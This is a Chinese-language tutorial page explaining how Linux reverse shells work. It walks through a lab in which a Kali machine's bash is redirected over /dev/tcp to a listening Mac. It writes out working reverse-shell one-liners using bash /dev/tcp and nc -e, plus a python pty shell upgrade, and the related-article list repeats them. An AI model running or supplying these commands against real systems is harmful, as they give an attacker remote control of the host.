linux反弹shell的原理详解

 更新时间:2020-11-19 04:08:40   作者:佚名   我要评论(0)

完整命令
反弹shell命令:


bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

利用nc反弹shell:


nc -lvvp 12345 -t -e /bin/bas

完整命令

反弹shell命令:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

利用nc反弹shell:

nc -lvvp 12345 -t -e /bin/bash

原理

bash -i > /dev/tcp/ip/port 0>&1 2>&1
bash -i 打开一个交互式的bash
&是为了区分文件1和文件描述符1的
a>&b 的意思是 a>b 2>&1
0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口跟攻击机的shell口。这命令的意思也可以理解为,将攻击机窗口的输入当作靶机窗口的输入最终输入给靶机。2代表标准错误输出。

实验

通过一个小实验帮助大家理解

第一步,将shell的正确输出重定向到外部主机

假设我们在kali上输入的命令为:
bash -i > /dev/tcp/192.168.124.1/9999,这句话的意思是将交互式shell的标准输出重定向到192.168.124.1的9999端口。

在mac上监听端口命令为:nc -l 9999

在这里插入图片描述

首先在kali上输入whoami命令,发现没有回显,因为回显被重定向到了mac上。

在这里插入图片描述

但是当我们在kali上出入错误命令的时候,却存在回显。

在这里插入图片描述

第二步,将错误输出重定向到外部主机

我们只需要在上面的命令后面加上 2>&1即可,意思为将错误输出重定向到标准输出上,也就是重定向到我们的外部主机。

在这里插入图片描述

这时候发现在kali上按键盘已经没有任何回显了,回显全部出现在了mac的shell上:

在这里插入图片描述

这是因为我们已经将所有的输出都重定向到了外部主机上,但问题是现在我们的控制权还在kali上,mac无法进行任何输出操作,只能显示输出。这时候我们几句需要将输入的权限给予我们的mac。

第三步,交出输入权限

只需要在第二步命令的基础上加上 0>&1即可。

在这里插入图片描述

这时候已经可以在mac上完全控制kali的shell了,实验结束。

其他

当shell不稳定时候用python的虚拟化终端:

python -c "import pty;pty.spawn('/bin/bash')"

参考:
https://www.freebuf.com/news/142195.html #将shell转换成完全tty
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com/post/id/87017

到此这篇关于linux反弹shell的原理详解的文章就介绍到这了,更多相关linux反弹shell内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:
  • Linux下NC反弹shell命令(推荐)
  • 浅析Linux之bash反弹shell原理

相关文章

  • linux反弹shell的原理详解

    linux反弹shell的原理详解

    完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bas
    2020-11-19
  • 浅析Linux之bash反弹shell原理

    浅析Linux之bash反弹shell原理

    环境 攻击机:kali ip:192.168.25.144 靶 机:centos ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令
    2020-11-19
  • Linux Shell 如何获取参数的方法

    Linux Shell 如何获取参数的方法

    $# 是传给脚本的参数个数 $0 是脚本本身的名字 $1 是传递给该shell脚本的第一个参数 $2 是传递给该shell脚本的第二个参数 $@ 是传给脚本的所有参数的列表
    2020-11-19
  • shell模糊匹配与正则详解

    shell模糊匹配与正则详解

    前言: 正则可以实现一些简单的功能,并用在脚本中,如检测ip地址是否符合规范,检测文件名是否符合规范等等。 正则表达式 正则表达式主要是用来描述一个句法规则
    2020-11-19
  • 详解shell中脚本参数传递的两种方式

    详解shell中脚本参数传递的两种方式

    方式一:$0,$1,$2.. 采用$0,$1,$2..等方式获取脚本命令行传入的参数,值得注意的是,$0获取到的是脚本路径以及脚本名,后面按顺序获取参数,当参数超过10个时(包括1
    2020-11-19
  • shell之定时周期性执行脚本的方法示例

    shell之定时周期性执行脚本的方法示例

    示例 1.编写测试脚本脚本 time .sh $ cat time.sh #! /bin/bash echo $(date +%s) >> /home/ocean/out.txt 保存完毕后记得给予权限 chmod 777 test.sh
    2020-11-19
  • Linux 通过 autojump 命令减少 cd 命令的使用的实现方法

    Linux 通过 autojump 命令减少 cd 命令的使用的实现方法

    Linux - 通过 autojump 命令减少 cd 命令的使用 1、安装 autojump git clone git://github.com/joelthelion/autojump.git 安装 cd autojump ./install.py 卸载
    2020-11-19
  • shell字符串截取报错:Bad substitution的解决

    shell字符串截取报错:Bad substitution的解决

    问题重现: 当前系统Ubuntu16 shell进行字符串截取 运行 ${GIT_COMMIT:0:6}报错: /tmp/jenkins7505855461406722507.sh: 4: /tmp/jenkins7505855461406722507.s
    2020-11-19
  • shell 判断字符串是否存在数组中的实现示例

    shell 判断字符串是否存在数组中的实现示例

    语法格式: [[ "${array[@]}" =~ "字符串" ]] 示例: #!/bin/sh ##数组 array=( address base cart company store ) # $1 如果存在,输出 $1 exists,$1 如
    2020-11-19
  • 详解shell 函数定义与调用

    详解shell 函数定义与调用

    一、Shell函数定义格式 shell函数定义格式,各部分说明如下: [ function ]等中括号括起来部分----表示可选(即可有可无) your_function_name部分----为函数名 you
    2020-11-19

最新评论